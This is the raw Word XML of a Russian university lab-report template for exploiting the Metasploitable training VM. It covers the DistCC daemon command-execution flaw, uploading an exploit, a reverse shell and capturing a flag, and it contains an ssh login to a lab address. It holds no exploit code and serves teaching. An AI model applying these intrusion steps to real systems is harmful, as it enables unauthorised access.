      <w:r w:rsidR="009C0952">
        <w:t xml:space="preserve"> Данные, полученные из </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009C0952" w:rsidRPr="009C0952">
        <w:t>phpinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009C0952">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009C0952" w:rsidRPr="009C0952">
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6D3DABD0" w14:textId="71F54F1C" w:rsidR="009C0952" w:rsidRDefault="009C0952" w:rsidP="00E80E53"/>
    <w:p w14:paraId="6AE8CB72" w14:textId="6F834838" w:rsidR="009C0952" w:rsidRPr="002E3825" w:rsidRDefault="009C0952" w:rsidP="00E80E53">
      <w:r w:rsidRPr="002E3825">
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Результаты создания </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>flag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C0952" w14:paraId="7CF5E88A" w14:textId="77777777" w:rsidTr="002B2CDE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10195" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3C21EFB6" w14:textId="34DEB183" w:rsidR="009C0952" w:rsidRDefault="009C0952" w:rsidP="002B2CDE">
            <w:pPr>
              <w:spacing w:before="240" w:after="240" w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Скриншот № 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1A768249" w14:textId="1BEFAF51" w:rsidR="009C0952" w:rsidRDefault="009C0952" w:rsidP="00E80E53"/>
    <w:p w14:paraId="55257ECE" w14:textId="6C4B9261" w:rsidR="00ED28F3" w:rsidRDefault="00ED28F3" w:rsidP="00E80E53">
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">6. </w:t>
      </w:r>
      <w:r>
        <w:t>Определить значение описания уязвимости «</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Description: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DistCC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Daemon Command Execution</w:t>
      </w:r>
      <w:r>
        <w:t>»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A514DC" w14:textId="3097D927" w:rsidR="00636D99" w:rsidRDefault="00636D99" w:rsidP="00E80E53"/>
    <w:p w14:paraId="4C726C08" w14:textId="436E8DEC" w:rsidR="00636D99" w:rsidRPr="00636D99" w:rsidRDefault="00636D99" w:rsidP="00E80E53">
      <w:r>
        <w:t xml:space="preserve">7. Дайте определение «демону» в ОС </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03476EDB" w14:textId="66746C0C" w:rsidR="00636D99" w:rsidRDefault="00636D99" w:rsidP="00E80E53"/>
    <w:p w14:paraId="1B61F3D0" w14:textId="5E4D6F42" w:rsidR="00636D99" w:rsidRDefault="00550F4A" w:rsidP="00E80E53">
      <w:r>
        <w:t>8. Дать краткую характеристику команда, выполненным в пунктах № 28-30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539"/>
        <w:gridCol w:w="6656"/>
      </w:tblGrid>
      <w:tr w:rsidR="00550F4A" w14:paraId="49B8B89B" w14:textId="77777777" w:rsidTr="00550F4A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3539" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68ED7862" w14:textId="77777777" w:rsidR="00550F4A" w:rsidRDefault="00550F4A" w:rsidP="00E80E53">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6656" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="793036F1" w14:textId="77777777" w:rsidR="00550F4A" w:rsidRDefault="00550F4A" w:rsidP="00E80E53">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00550F4A" w14:paraId="494BEFBE" w14:textId="77777777" w:rsidTr="00550F4A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3539" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E8EF24B" w14:textId="77777777" w:rsidR="00550F4A" w:rsidRDefault="00550F4A" w:rsidP="00E80E53">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6656" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5CF1F4DF" w14:textId="77777777" w:rsidR="00550F4A" w:rsidRDefault="00550F4A" w:rsidP="00E80E53">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00550F4A" w14:paraId="65ADEA83" w14:textId="77777777" w:rsidTr="00550F4A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3539" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="013938F9" w14:textId="77777777" w:rsidR="00550F4A" w:rsidRDefault="00550F4A" w:rsidP="00E80E53">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6656" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B4B5FFC" w14:textId="77777777" w:rsidR="00550F4A" w:rsidRDefault="00550F4A" w:rsidP="00E80E53">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7AC803DC" w14:textId="1DD2D1D3" w:rsidR="00550F4A" w:rsidRDefault="00550F4A" w:rsidP="00E80E53"/>
    <w:p w14:paraId="3BC843A0" w14:textId="528EC973" w:rsidR="00550F4A" w:rsidRDefault="00550F4A" w:rsidP="00E80E53">
      <w:r>
        <w:t xml:space="preserve">9. </w:t>
      </w:r>
      <w:r w:rsidR="006042CD">
        <w:t>Загрузка эксплойта на уязвимую машину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042CD" w14:paraId="1B1EEE83" w14:textId="77777777" w:rsidTr="002B2CDE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10195" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="05D0176A" w14:textId="3C433E4C" w:rsidR="006042CD" w:rsidRDefault="006042CD" w:rsidP="002B2CDE">
            <w:pPr>
              <w:spacing w:before="240" w:after="240" w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Скриншот № 4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4AD31226" w14:textId="54B36F70" w:rsidR="006042CD" w:rsidRDefault="006042CD" w:rsidP="00E80E53">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">10. Поясните цель использования </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006042CD">
        <w:t>reverse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006042CD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006042CD">
        <w:t>shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> в пункте 37 Л/р</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C6F65B" w14:textId="25E5AC4B" w:rsidR="006042CD" w:rsidRDefault="006042CD" w:rsidP="00E80E53"/>
    <w:p w14:paraId="770F8BAB" w14:textId="1A509BC9" w:rsidR="006042CD" w:rsidRDefault="006042CD" w:rsidP="00E80E53">
      <w:r>
        <w:t>11. Результаты получения секрета из флага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042CD" w14:paraId="069D4149" w14:textId="77777777" w:rsidTr="002B2CDE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10195" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7BF87B40" w14:textId="3FEBB73D" w:rsidR="006042CD" w:rsidRDefault="006042CD" w:rsidP="002B2CDE">
            <w:pPr>
              <w:spacing w:before="240" w:after="240" w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Скриншот № 5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="21752CA9" w14:textId="50E171A8" w:rsidR="006042CD" w:rsidRDefault="006042CD" w:rsidP="00E80E53"/>
    <w:p w14:paraId="73D21358" w14:textId="753693D2" w:rsidR="006042CD" w:rsidRDefault="006042CD" w:rsidP="00E80E53">
      <w:r>
        <w:t>12. Индивидуальные выводы по лабораторной работе.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D1E6D6" w14:textId="1874A065" w:rsidR="006042CD" w:rsidRDefault="006042CD" w:rsidP="00E80E53">
      <w:r>
        <w:t xml:space="preserve">Вывод по работе формируются студентом </w:t>
      </w:r>
      <w:r w:rsidRPr="006042CD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>индивидуально</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r w:rsidRPr="006042CD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>независимо</w:t>
      </w:r>
      <w:r w:rsidRPr="006042CD">
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">от согруппников. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53051C62" w14:textId="70703842" w:rsidR="00D66FB7" w:rsidRDefault="00D66FB7" w:rsidP="00E80E53">
      <w:r>
        <w:t>Вывод должен содержать информацию о:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D39FFAF" w14:textId="3EE352B0" w:rsidR="006042CD" w:rsidRDefault="00D66FB7" w:rsidP="00D66FB7">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">понятой </w:t>
      </w:r>
      <w:r w:rsidRPr="00D66FB7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>лично Вами</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> цели Л/р,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FD4493" w14:textId="1324670F" w:rsidR="00D66FB7" w:rsidRDefault="00D66FB7" w:rsidP="00D66FB7">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>оценке достигнутого результата по итогам выполнения Л/р</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B54433" w14:textId="6B2C7C1C" w:rsidR="00D66FB7" w:rsidRPr="00636D99" w:rsidRDefault="00D66FB7" w:rsidP="00D66FB7">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>знаниях, полученных в результате выполнения Л/р</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F060C87" w14:textId="7AAAEF62" w:rsidR="00D66FB7" w:rsidRPr="00636D99" w:rsidRDefault="00D66FB7" w:rsidP="00D66FB7">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>умениях, полученных в результате выполнения Л/р</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3811FEE2" w14:textId="63DA0AC9" w:rsidR="00D66FB7" w:rsidRPr="00636D99" w:rsidRDefault="00D66FB7" w:rsidP="00D66FB7">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>практических навыках, полученных в результате выполнения Л/р</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00D66FB7" w:rsidRPr="00636D99" w:rsidSect="00BB7B57">
      <w:footerReference w:type="default" r:id="rId44"/>
      <w:type w:val="evenPage"/>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="1134" w:right="567" w:bottom="1134" w:left="1134" w:header="709" w:footer="709" w:gutter="0"/>
      <w:pgNumType w:start="1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lexandr Dr." w:date="2020-03-03T22:12:00Z" w:initials="AD">
    <w:p w14:paraId="6E09DC02" w14:textId="66AB4DC7" w:rsidR="0058112A" w:rsidRPr="0058112A" w:rsidRDefault="0058112A">
      <w:pPr>
        <w:pStyle w:val="af7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af6"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Зафиксировать скриншот, на котором видны обе виртуальные машины и их </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0058112A">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>адреса</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="1" w:author="Alexandr Dr." w:date="2020-03-03T22:16:00Z" w:initials="AD">
    <w:p w14:paraId="703E9438" w14:textId="425E2B17" w:rsidR="00154310" w:rsidRDefault="00154310">
      <w:pPr>
        <w:pStyle w:val="af7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af6"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>Сделать скриншот результатов подключения</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A7EDF8" w14:textId="77777777" w:rsidR="00154310" w:rsidRDefault="00154310">
      <w:pPr>
        <w:pStyle w:val="af7"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5845E683" w14:textId="40F5710F" w:rsidR="00154310" w:rsidRDefault="00154310" w:rsidP="00154310">
      <w:pPr>
        <w:pStyle w:val="af7"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Приведите примеры команд, которые теперь можно скрытно исполнить на управляемой машине </w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="2" w:author="Ruslan" w:date="2023-02-02T14:08:00Z" w:initials="R">
    <w:p w14:paraId="5B5C193B" w14:textId="248FD541" w:rsidR="003034C2" w:rsidRPr="003034C2" w:rsidRDefault="003034C2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3034C2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003034C2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003034C2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>oHostKeyAlgorithms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003034C2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=+</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003034C2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ssh-dss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003034C2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> msfadmin@192.168.56.101</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="4" w:author="Alexandr Dr." w:date="2020-03-03T22:21:00Z" w:initials="AD">
    <w:p w14:paraId="1F0DD2AA" w14:textId="66A98C33" w:rsidR="009C0952" w:rsidRDefault="009C0952">
      <w:pPr>
        <w:pStyle w:val="af7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af6"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>Укажите, какие данные из представленного перечня могут быть использованы для злонамеренных действий</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="5" w:author="Alexandr Dr." w:date="2020-03-03T22:27:00Z" w:initials="AD">
    <w:p w14:paraId="12963D50" w14:textId="4C21C284" w:rsidR="009C0952" w:rsidRDefault="009C0952">
      <w:pPr>
        <w:pStyle w:val="af7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af6"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>Сделать скриншот полученных результатов</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="6" w:author="Alexandr Dr." w:date="2020-03-03T22:32:00Z" w:initials="AD">
    <w:p w14:paraId="5D0C0EA3" w14:textId="77777777" w:rsidR="00ED28F3" w:rsidRDefault="00ED28F3">
      <w:pPr>
        <w:pStyle w:val="af7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af6"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>Поясните, что в данном случае означает запись</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CF4FDE" w14:textId="3A112CA1" w:rsidR="00ED28F3" w:rsidRPr="002E3825" w:rsidRDefault="00ED28F3">
      <w:pPr>
        <w:pStyle w:val="af7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r w:rsidRPr="002E3825">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DistCC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002E3825">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Daemon</w:t>
      </w:r>
      <w:r w:rsidRPr="002E3825">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Command</w:t>
      </w:r>
      <w:r w:rsidRPr="002E3825">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Execution</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="7" w:author="Alexandr Dr." w:date="2020-03-03T22:38:00Z" w:initials="AD">
    <w:p w14:paraId="46523A2A" w14:textId="1175B91F" w:rsidR="00636D99" w:rsidRPr="00636D99" w:rsidRDefault="00636D99">
      <w:pPr>
        <w:pStyle w:val="af7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af6"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>Дайте определение тому, что называется «</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>daemon</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">» в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Unix</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> системах</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="8" w:author="Alexandr Dr." w:date="2020-03-03T22:41:00Z" w:initials="AD">
    <w:p w14:paraId="01D20ED5" w14:textId="4C7B61A3" w:rsidR="00550F4A" w:rsidRPr="00550F4A" w:rsidRDefault="00550F4A">
      <w:pPr>
        <w:pStyle w:val="af7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af6"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Ознакомившись с описанием дайте свою краткую характеристику для каких целей в дальнейшем, будут использованы данные из </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="9" w:author="Alexandr Dr." w:date="2020-03-03T22:42:00Z" w:initials="AD">
    <w:p w14:paraId="05999C7E" w14:textId="7DCE0153" w:rsidR="00550F4A" w:rsidRPr="00550F4A" w:rsidRDefault="00550F4A" w:rsidP="00550F4A">
      <w:pPr>
        <w:pStyle w:val="af7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af6"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>Кратко дайте характеристику вводимой команды и укажите для каких целей в дальнейшем, будут использованы данные о компиляторах</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1217E0B1" w14:textId="33F8FC5E" w:rsidR="00550F4A" w:rsidRDefault="00550F4A">
      <w:pPr>
        <w:pStyle w:val="af7"/>
      </w:pPr>
    </w:p>
  </w:comment>
  <w:comment w:id="10" w:author="Alexandr Dr." w:date="2020-03-03T22:43:00Z" w:initials="AD">
    <w:p w14:paraId="6315DB97" w14:textId="712A70A4" w:rsidR="00550F4A" w:rsidRDefault="00550F4A">
      <w:pPr>
        <w:pStyle w:val="af7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af6"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>Кратко дайте характеристику вводимой команды и укажите для каких целей нам необходима полученная при её выполнении информация</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="11" w:author="Alexandr Dr." w:date="2020-03-03T22:52:00Z" w:initials="AD">
    <w:p w14:paraId="78670C7D" w14:textId="0D10C6E6" w:rsidR="006042CD" w:rsidRDefault="006042CD">
      <w:pPr>
        <w:pStyle w:val="af7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af6"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>Сделайте скриншот успешного выполнения задачи</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="13" w:author="Alexandr Dr." w:date="2020-03-03T22:54:00Z" w:initials="AD">
    <w:p w14:paraId="24165E43" w14:textId="72482659" w:rsidR="006042CD" w:rsidRDefault="006042CD">
      <w:pPr>
        <w:pStyle w:val="af7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af6"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Поясните для какой цели в данном случае нами применяется </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006042CD">
        <w:t>reverse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006042CD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006042CD">
        <w:t>shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
  </w:comment>
  <w:comment w:id="15" w:author="Alexandr Dr." w:date="2020-03-03T22:56:00Z" w:initials="AD">
    <w:p w14:paraId="615908D8" w14:textId="2C08E785" w:rsidR="006042CD" w:rsidRPr="006042CD" w:rsidRDefault="006042CD">
      <w:pPr>
        <w:pStyle w:val="af7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af6"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Сделать скриншот успешного выполнения зачади Л/р так, чтобы было видно значение </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>flag</w:t>
      </w:r>
      <w:r w:rsidRPr="006042CD">
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:t>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E09DC02" w15:done="0"/>
  <w15:commentEx w15:paraId="5845E683" w15:done="0"/>
  <w15:commentEx w15:paraId="5B5C193B" w15:done="0"/>
  <w15:commentEx w15:paraId="1F0DD2AA" w15:done="0"/>
  <w15:commentEx w15:paraId="12963D50" w15:done="0"/>
  <w15:commentEx w15:paraId="68CF4FDE" w15:done="0"/>
  <w15:commentEx w15:paraId="46523A2A" w15:done="0"/>
  <w15:commentEx w15:paraId="01D20ED5" w15:done="0"/>
  <w15:commentEx w15:paraId="1217E0B1" w15:done="0"/>
  <w15:commentEx w15:paraId="6315DB97" w15:done="0"/>
  <w15:commentEx w15:paraId="78670C7D" w15:done="0"/>
  <w15:commentEx w15:paraId="24165E43" w15:done="0"/>
  <w15:commentEx w15:paraId="615908D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E09DC02" w16cid:durableId="220954D3"/>
  <w16cid:commentId w16cid:paraId="5845E683" w16cid:durableId="220955C7"/>
  <w16cid:commentId w16cid:paraId="5B5C193B" w16cid:durableId="27864265"/>
  <w16cid:commentId w16cid:paraId="1F0DD2AA" w16cid:durableId="220956DB"/>
  <w16cid:commentId w16cid:paraId="12963D50" w16cid:durableId="22095846"/>
  <w16cid:commentId w16cid:paraId="68CF4FDE" w16cid:durableId="2209596B"/>
  <w16cid:commentId w16cid:paraId="46523A2A" w16cid:durableId="22095ACB"/>
  <w16cid:commentId w16cid:paraId="01D20ED5" w16cid:durableId="22095BB3"/>
  <w16cid:commentId w16cid:paraId="1217E0B1" w16cid:durableId="22095BE3"/>
  <w16cid:commentId w16cid:paraId="6315DB97" w16cid:durableId="22095C17"/>
  <w16cid:commentId w16cid:paraId="78670C7D" w16cid:durableId="22095E3D"/>
  <w16cid:commentId w16cid:paraId="24165E43" w16cid:durableId="22095E92"/>
  <w16cid:commentId w16cid:paraId="615908D8" w16cid:durableId="22095F0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F0AC8" w14:textId="77777777" w:rsidR="00A72E08" w:rsidRDefault="00A72E08" w:rsidP="009F5C88">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="402CFFE1" w14:textId="77777777" w:rsidR="00A72E08" w:rsidRDefault="00A72E08" w:rsidP="009F5C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8928951"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr/>
    <w:sdtContent>
      <w:p w14:paraId="0763D5E6" w14:textId="3AF493BE" w:rsidR="004F1500" w:rsidRDefault="004F15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33D7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1AFDC" w14:textId="77777777" w:rsidR="00A72E08" w:rsidRDefault="00A72E08" w:rsidP="009F5C88">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="3FA531DB" w14:textId="77777777" w:rsidR="00A72E08" w:rsidRDefault="00A72E08" w:rsidP="009F5C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511B8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AFE47164"/>
    <w:lvl w:ilvl="0" w:tplc="D26AE8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61E6439"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="59C4152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85411C6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3C2CF4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0273723"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AD983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65CF2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FE8E3822"/>
    <w:lvl w:ilvl="0" w:tplc="A880C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390C55"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="87625560"/>
    <w:lvl w:ilvl="0" w:tplc="E948F846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5356A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AB20841E"/>
    <w:lvl w:ilvl="0" w:tplc="96C21ED0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CDD2161"/>
    <w:multiLevelType w:val="multilevel"/>
